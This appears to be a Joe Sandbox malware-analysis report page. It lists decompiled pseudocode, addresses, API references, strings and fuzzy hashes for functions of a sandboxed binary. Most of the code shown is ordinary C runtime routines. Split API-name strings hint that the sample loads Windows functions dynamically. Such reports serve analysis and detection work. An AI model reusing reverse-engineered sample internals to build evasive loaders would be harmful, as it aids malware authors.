Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f3b7e6ba0af749eeb3d66354740e9b7ce997f8c984365c79cbf828af9de40ec3
Instruction ID: b584655cf96a502e964e611372f638a866187e630dd0aad575d1f52555cec69c
Opcode Fuzzy Hash: f3b7e6ba0af749eeb3d66354740e9b7ce997f8c984365c79cbf828af9de40ec3
Instruction Fuzzy Hash: 4821BABA900109AFCB41EFA8C9D2DDD7BB9FF18644F044169EA159B621FB31DA45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 013B11A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 117COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 013B11A5

Part of subcall function 013B1C6A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013B1C76
Part of subcall function 013B1C6A: __RTC_Initialize.LIBCMT ref: 013B1CBC

Strings

GetP, xrefs: 013B127B
Koad, xrefs: 013B1217
qess, xrefs: 013B1284
`ryA, xrefs: 013B1225
string too long, xrefs: 013B11A0
GetSystemInfo, xrefs: 013B11C7, 013B12C0
kernel32.dll, xrefs: 013B11C0, 013B12B2

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: InitializeXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: GetP$GetSystemInfo$Koad$`ryA$kernel32.dll$qess$string too long
API String ID: 937804987-2370726519
Opcode ID: f6d33cdc749d9d0b72b091a61ac58b97106ccc6452c3046865ae496aefdbc951
Instruction ID: 22cdb678ae46ca1f9d87bfe6e15f0a1abf91b91d0457a1ca7fae4d9045fd4e07
Opcode Fuzzy Hash: f6d33cdc749d9d0b72b091a61ac58b97106ccc6452c3046865ae496aefdbc951
Instruction Fuzzy Hash: 38415CB6A012099FC760DF5DE880A95F3F5FF88318B2941A5DA04E7716E730B951CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 013B9EC4 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E013B9EC4(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E013C2100(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E013B674B(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x13d9828 - _t110; // 0xcdea90
							if(__eflags != 0) {
								L14:
								_t64 =  *0x13d9828; // 0xcdea90
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E013BA1CC(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E013BAD06(_t120, _t139, 4);
													E013B67BB(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E013B67BB( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E013BAD06(_t139, _t138, 4);
												E013B67BB(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x13d9828 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E013B675E(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E013B67BB(_t149);
													goto L40;
												} else {
													_t76 = E013B627F(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E013B4FA2();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E013B675E(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E013B62D9(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E013B67BB(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E013B675E(_t53, 1);
																		E013B67BB(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E013B627F( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E013B4FA2();
																				asm("int3");
																				_t84 =  *0x13d9828; // 0xcdea90
																				__eflags = _t84 -  *0x13d9834; // 0xcdea90
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x13d9828 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E013BEDD7(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E013B674B(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x13d9828 = E013B675E(1, 4);
										E013B67BB(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x13d9828 - _t110; // 0xcdea90
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x13d982c - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x13d982c = E013B675E(1, 4);
												E013B67BB(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x13d982c - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E013B67BB(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x13d982c - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L013B5734();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E013B674B(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x013b9ec4
0x013b9ec7
0x013b9ec9
0x013b9ecd
0x013b9ed0
0x013b9ed2
0x013b9ee7
0x013b9eec
0x013b9eee
0x013b9ef3
0x013b9ef8
0x013b9efa
0x013ba0db
0x013ba0e0
0x00000000
0x013b9f00
0x013b9f00
0x013b9f02
0x00000000
0x013b9f08
0x013b9f0b
0x013b9f0e
0x013b9f13
0x013b9f15
0x013b9f1b
0x013b9f98
0x013b9f98
0x013b9f9d
0x013b9fa0
0x013b9fa2
0x00000000
0x013b9fa8
0x013b9faf
0x013b9fb4
0x013b9fb9
0x013b9fbc
0x013b9fbe
0x013ba00f
0x013ba00f
0x013ba012
0x00000000
0x013ba018
0x013ba018
0x013ba01a
0x013ba01d
0x013ba01d
0x013ba020
0x013ba022
0x00000000
0x013ba028
0x013ba028
0x013ba02e
0x00000000
0x013ba034
0x013ba03e
0x013ba041
0x013ba046
0x013ba049
0x013ba04c
0x013ba04e
0x00000000
0x013ba054
0x013ba054
0x013ba057
0x013ba059
0x013ba05c
0x00000000
0x013ba05c
0x013ba04e
0x013ba02e
0x013ba022
0x013b9fc0
0x013b9fc0
0x013b9fc2
0x00000000
0x013b9fc4
0x013b9fc7
0x013b9fcd
0x013b9fd0
0x013b9fd3
0x013ba008
0x013ba00a
0x013b9fd5
0x013b9fd5
0x013b9fe2
0x013b9fe2
0x013b9fe5
0x00000000
0x00000000
0x013b9fde
0x013b9fe1
0x013b9fe1
0x013b9fe1
0x013b9ff1
0x013b9ff4
0x013b9ff9
0x013b9ffc
0x013b9fff
0x013ba001
0x013ba060
0x013ba060
0x013ba060
0x013ba001
0x013ba065
0x013ba068
0x00000000
0x013ba06a
0x013ba06a
0x013ba06d
0x013ba06d
0x013ba06f
0x013ba070
0x013ba070
0x013ba07c
0x013ba084
0x013ba087
0x013ba088
0x013ba08a
0x013ba0d2
0x013ba0d3
0x00000000
0x013ba08c
0x013ba093
0x013ba098
0x013ba09b
0x013ba09d
0x013ba0f7
0x013ba0f8
0x013ba0f9
0x013ba0fa
0x013ba0fb
0x013ba0fc
0x013ba101
0x013ba104
0x013ba108
0x013ba109
0x013ba10c
0x013ba10e
0x013ba115
0x013ba117
0x013ba119
0x013ba11b
0x013ba11d
0x013ba11d
0x013ba120
0x013ba121
0x013ba121
0x013ba11d
0x013ba127
0x013ba132
0x013ba135
0x013ba136
0x013ba138
0x013ba1a0
0x013ba1a0
0x00000000
0x013ba13a
0x013ba13a
0x013ba13c
0x013ba13e
0x013ba190
0x013ba192
0x013ba198
0x00000000
0x013ba140
0x013ba140
0x013ba143
0x013ba143
0x013ba145
0x013ba145
0x013ba145
0x013ba148
0x013ba148
0x013ba14a
0x013ba14b
0x013ba14b
0x013ba153
0x013ba157
0x013ba161
0x013ba164
0x013ba169
0x013ba16c
0x013ba170
0x00000000
0x013ba172
0x013ba17a
0x013ba17f
0x013ba182
0x013ba184
0x013ba1a5
0x013ba1a7
0x013ba1a8
0x013ba1a9
0x013ba1aa
0x013ba1ab
0x013ba1ac
0x013ba1b1
0x013ba1b2
0x013ba1b7
0x013ba1bd
0x013ba1bf
0x013ba1c0
0x013ba1c6
0x00000000
0x013ba1c6
0x013ba1cb
0x00000000
0x00000000
0x00000000
0x013ba184
0x00000000
0x013ba186
0x013ba186
0x013ba189
0x013ba18b
0x013ba18b
0x00000000
0x013ba18f
0x013ba13e
0x013ba110
0x013ba110
0x013ba110
0x013ba112
0x013ba114
0x013ba114
0x013ba09f
0x013ba0b0
0x013ba0b4
0x013ba0c0
0x013ba0c2
0x013ba0c4
0x013ba0c9
0x013ba0c9
0x013ba0cc
0x013ba0cc
0x00000000
0x013ba0c2
0x013ba09d
0x013ba08a
0x013ba068
0x013b9fc2
0x013b9fbe
0x013b9f1d
0x013b9f1d
0x013b9f20
0x013b9f3e
0x013b9f3e
0x013b9f41
0x013b9f54
0x013b9f59
0x013b9f5e
0x013b9f61
0x013b9f67
0x013ba0e6
0x013ba0e6
0x013ba0e6
0x00000000
0x013b9f6d
0x013b9f6d
0x013b9f73
0x00000000
0x013b9f75
0x013b9f7f
0x013b9f84
0x013b9f89
0x013b9f8c
0x013b9f92
0x00000000
0x00000000
0x00000000
0x00000000
0x013b9f92
0x013b9f73
0x013b9f43
0x013b9f43
0x013ba0e9
0x013ba0ea
0x013ba0f1
0x00000000
0x013ba0f3
0x013b9f22
0x013b9f22
0x013b9f28
0x00000000
0x013b9f2a
0x013b9f2f
0x013b9f31
0x00000000
0x013b9f37
0x013b9f37
0x00000000
0x013b9f37
0x013b9f31
0x013b9f28
0x013b9f20
0x013b9f1b
0x013b9f02
0x013b9ed4
0x013b9ed4
0x013b9ed9
0x013b9edf
0x013ba0f4
0x013ba0f6
0x013ba0f6
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 013B9EEE
_free.LIBCMT ref: 013B9FC7
_free.LIBCMT ref: 013B9FF4

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: caad24602481510354b343263db9ecfd96287006930a9385539c6ca14bc1267b
Instruction ID: ff478010e833a649c5e15ca171fe64584642031f41052605786365f35be35a7a
Opcode Fuzzy Hash: caad24602481510354b343263db9ecfd96287006930a9385539c6ca14bc1267b
Instruction Fuzzy Hash: 9551F8B1D04606AFDB20AF7CD8C2AED7FA8AF0572CF04816DDB1197A81FA328541CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013B2980 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E013B2980(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E013C222B(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x13ca014;
				E013B2940(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x13ca014);
				E013B2EF7(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E013B2EE0(_t77, 0xfffffffe, _t96, 0x13ca014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E013B2E80(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E013B2940(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x13c31bc;
											if(__eflags != 0) {
												_t72 = E013C1BD0(__eflags, 0x13c31bc);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x13c31bc; // 0x13b2b14
													 *0x13c310c(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E013B2EC0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E013B2EE0(_t64, _t93, _t96, 0x13ca014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E013B2940(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E013B2EA0();
										asm("int3");
										_t66 = E013B3031();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E013B2FE3(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E013B306D();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x013b2980
0x013b2987
0x013b298b
0x013b298c
0x013b2992
0x013b299e
0x013b29a0
0x013b29a6
0x013b29a6
0x013b29af
0x013b29b1
0x013b29b4
0x013b29b7
0x013b29bf
0x013b29c4
0x013b29c7
0x013b29ca
0x013b29d1
0x013b2a2d
0x013b2a30
0x013b2a38
0x013b2a3f
0x00000000
0x013b2a3f
0x00000000
0x013b29d3
0x013b29d3
0x013b29d9
0x013b29df
0x013b29e5
0x013b2a50
0x013b2a59
0x013b29e7
0x013b29e7
0x013b29e7
0x013b29ed
0x013b29f0
0x013b29f3
0x013b29f6
0x013b29f9
0x013b29fe
0x013b2a14
0x00000000
0x013b2a00
0x013b2a00
0x013b2a02
0x013b2a07
0x013b2a09
0x013b2a0c
0x013b2a0e
0x013b2a24
0x013b2a44
0x013b2a44
0x013b2a48
0x00000000
0x013b2a10
0x013b2a10
0x013b2a5a
0x013b2a5d
0x013b2a63
0x013b2a65
0x013b2a6c
0x013b2a73
0x013b2a78
0x013b2a7b
0x013b2a7d
0x013b2a7f
0x013b2a8c
0x013b2a92
0x013b2a94
0x013b2a97
0x013b2a97
0x013b2a9a
0x013b2a9a
0x013b2a6c
0x013b2aa0
0x013b2aa2
0x013b2aa7
0x013b2aaa
0x013b2aad
0x013b2ab5
0x013b2ab9
0x013b2abe
0x013b2abe
0x013b2ac1
0x013b2ac5
0x013b2ac8
0x013b2ad5
0x013b2ad8
0x013b2add
0x013b2ade
0x013b2ae3
0x013b2ae5
0x013b2aea
0x013b2aef
0x013b2af1
0x013b2afc
0x013b2af3
0x013b2af3
0x00000000
0x013b2af3
0x013b2ae7
0x013b2ae7
0x013b2ae7
0x013b2ae9
0x013b2ae9
0x013b2a12
0x00000000
0x013b2a12
0x013b2a10
0x013b2a0e
0x00000000
0x013b2a17
0x013b2a17
0x013b2a19
0x013b2a20
0x00000000
0x013b2a22
0x00000000
0x013b2a20
0x013b29e5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 013B29B7
___except_validate_context_record.LIBVCRUNTIME ref: 013B29BF
_ValidateLocalCookies.LIBCMT ref: 013B2A48
__IsNonwritableInCurrentImage.LIBCMT ref: 013B2A73
_ValidateLocalCookies.LIBCMT ref: 013B2AC8

Strings

csm, xrefs: 013B2A5D

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2173ed63e7a18980fb6b332bb881d519c416d8c870146f87148550299f19a516
Instruction ID: 97f7bceb494c8a4f2b89d7fe78a1bbcdaf7cb18e2eb07a4d5cf1046211b174b1
Opcode Fuzzy Hash: 2173ed63e7a18980fb6b332bb881d519c416d8c870146f87148550299f19a516
Instruction Fuzzy Hash: 35418F34A002099FDB20EF6DC880ADFBBB5AF45328F148259DA196B651EB31F915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013BA741 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013BA741(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E013BA709(_t45, 7);
					E013BA709(_t45 + 0x1c, 7);
					E013BA709(_t45 + 0x38, 0xc);
					E013BA709(_t45 + 0x68, 0xc);
					E013BA709(_t45 + 0x98, 2);
					E013B67BB( *((intOrPtr*)(_t45 + 0xa0)));
					E013B67BB( *((intOrPtr*)(_t45 + 0xa4)));
					E013B67BB( *((intOrPtr*)(_t45 + 0xa8)));
					E013BA709(_t45 + 0xb4, 7);
					E013BA709(_t45 + 0xd0, 7);
					E013BA709(_t45 + 0xec, 0xc);
					E013BA709(_t45 + 0x11c, 0xc);
					E013BA709(_t45 + 0x14c, 2);
					E013B67BB( *((intOrPtr*)(_t45 + 0x154)));
					E013B67BB( *((intOrPtr*)(_t45 + 0x158)));
					E013B67BB( *((intOrPtr*)(_t45 + 0x15c)));
					return E013B67BB( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x013ba747
0x013ba74c
0x013ba755
0x013ba760
0x013ba76b
0x013ba776
0x013ba784
0x013ba78f
0x013ba79a
0x013ba7a5
0x013ba7b3
0x013ba7c1
0x013ba7d2
0x013ba7e0
0x013ba7ee
0x013ba7f9
0x013ba804
0x013ba80f
0x00000000
0x013ba81f
0x013ba824

APIs

Part of subcall function 013BA709: _free.LIBCMT ref: 013BA72E

_free.LIBCMT ref: 013BA78F

Part of subcall function 013B67BB: HeapFree.KERNEL32(00000000,00000000,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?), ref: 013B67D1
Part of subcall function 013B67BB: GetLastError.KERNEL32(?,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?,?), ref: 013B67E3

_free.LIBCMT ref: 013BA79A
_free.LIBCMT ref: 013BA7A5
_free.LIBCMT ref: 013BA7F9
_free.LIBCMT ref: 013BA804
_free.LIBCMT ref: 013BA80F
_free.LIBCMT ref: 013BA81A

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0b8029c6af21961f77b5e536d88e10d9b26bbfaea6ec621aa4e3084c231ac962
Instruction ID: 0e175e39900370587a4290acfe6000e4d5d51bed36fe711f521d7a1d097f04d2
Opcode Fuzzy Hash: 0b8029c6af21961f77b5e536d88e10d9b26bbfaea6ec621aa4e3084c231ac962
Instruction Fuzzy Hash: A0117F71544B05AAD630B7B4CCC7FCB77ACAF14704F440818E79AA7892FA64F5049A90

Uniqueness

Uniqueness Score: -1.00%

Function 013BB9B4 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E013BB9B4(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
